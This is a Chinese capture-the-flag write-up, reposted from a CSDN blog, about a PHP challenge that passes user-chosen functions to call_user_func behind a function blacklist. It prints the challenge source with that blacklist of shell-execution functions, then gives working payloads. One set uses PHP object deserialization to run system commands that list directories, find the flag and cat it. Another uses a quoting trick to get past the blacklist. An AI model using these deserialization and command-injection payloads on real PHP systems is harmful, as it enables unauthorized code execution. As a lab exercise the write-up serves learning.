当前位置:
  1. 首页
  2. 互联网
  3. 正文
本文介绍: 这里我们需要查看页面源代码,进行代码审计 在这里我们可以使用多种函数进行查看 例如:file_get_contents、highlight_file() ,show_source()等。我们要对黑名单进行一个绕过 所以在本关我们可以使用别的方法来达到获取flag的目的 php内的” “在做代码执行的时候,会识别特殊字符串,绕过黑名单。但是在尝试system的时候发现hacking,说明被过滤了,试了passthru()同样也是。先抓包看看,发现post参数,可能是前面传的是函数,后面是函数的参数。

先发现他的页面一直刷新,时间也一直刷新,有点眼熟

先抓包看看,发现post参数,可能是前面传的是函数,后面是函数的参数

image-20240122183028569

试试其他函数比如MD5()确实执行了

image-20240122183245637

但是在尝试system的时候发现hacking,说明被过滤了,试了passthru()同样也是

image-20240122183429853

这里我们需要查看页面源代码,进行代码审计 在这里我们可以使用多种函数进行查看 例如:file_get_contents、highlight_file() ,show_source()等

file_get_contents(index.php):读取文件的内容

其他师傅通过func=file_get_contents&p=index.php得到源码 可我却没有,我也不清楚了

image-20240122184340439

 <?php
    $disable_fun = array("exec","shell_exec","system","passthru","proc_open","show_source","phpinfo","popen","dl","eval","proc_terminate","touch","escapeshellcmd","escapeshellarg","assert","substr_replace","call_user_func_array","call_user_func","array_filter", "array_walk",  "array_map","registregister_shutdown_function","register_tick_function","filter_var", "filter_var_array", "uasort", "uksort", "array_reduce","array_walk", "array_walk_recursive","pcntl_exec","fopen","fwrite","file_put_contents");
    function gettime($func, $p) {
        $result = call_user_func($func, $p);
        $a= gettype($result);
        if ($a == "string") {
            return $result;
        } else {return "";}
    }
    class Test {
        var $p = "Y-m-d h:i:s a";
        var $func = "date";
        function __destruct() {
            if ($this->func != "") {
                echo gettime($this->func, $this->p);
            }
        }
    }
    $func = $_REQUEST["func"];
    $p = $_REQUEST["p"];
​
    if ($func != null) {
        $func = strtolower($func);
        if (!in_array($func,$disable_fun)) {
            echo gettime($func, $p);
        }else {
            die("Hacker...");
        }
    }
    ?>

代码审计,本关的黑名单还是挺全面的。

方法一:

但咱们可以使用 反序列化 (出题人的本意也应该是这样)

<?php
  class Test{
     var $p="ls /";
     var $func="system";
     }
$a=new Test();
echo serialize($a);
?>

构造payload:

func=unserialize&p=O:4:"Test":2:{s:1:"p";s:2:"ls";s:4:"func";s:6:"system";}

并没有发现有用的

image-20240122184521609

查看根目录也是没有

func=unserialize&p=O:4:"Test":2:{s:1:"p";s:4:"ls /";s:4:"func";s:6:"system";}

image-20240122184729120

发现还是没有 falg的信息

system(“find / -name flag”):查找所有文件名匹配flag的文件

func=unserialize&p=O:4:"Test":2:{s:1:"p";s:18:"find / -name flag*";s:4:"func";s:6:"system";}

image-20240122184909370

<?php
class Test
{
​
   var $func = "system";
   var $p = "cat /tmp/flagoefiu4r93";
}
$a = new Test();
echo serialize($a);
func=unserialize&p=O:4:"Test":2:{s:4:"func";s:6:"system";s:1:"p";s:22:"cat /tmp/flagoefiu4r93";}

image-20240122191244785

方法二:

我们要对黑名单进行一个绕过 所以在本关我们可以使用别的方法来达到获取flag的目的 php内的” “在做代码执行的时候,会识别特殊字符串,绕过黑名单

func=system&p=find / -name flag*

image-20240122191632961

func=system&p=cat /tmp/flagoefiu4r93

image-20240122191722601

原文地址:https://blog.csdn.net/qq_74806534/article/details/135774832

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。

如若转载,请注明出处:http://www.7code.cn/show_61979.html

如若内容造成侵权/违法违规/事实不符,请联系代码007邮箱:suwngjj01@126.com进行投诉反馈,一经查实,立即删除!

上一篇 C语言signal处理的底层机制深度探讨
下一篇 React Hooks 源码解析:useEffect

相关文章

发表回复

您的电子邮箱地址不会被公开。 必填项已用 * 标注

插入图片
浏览器会保存昵称、邮箱和网站cookies信息,下次评论时使用。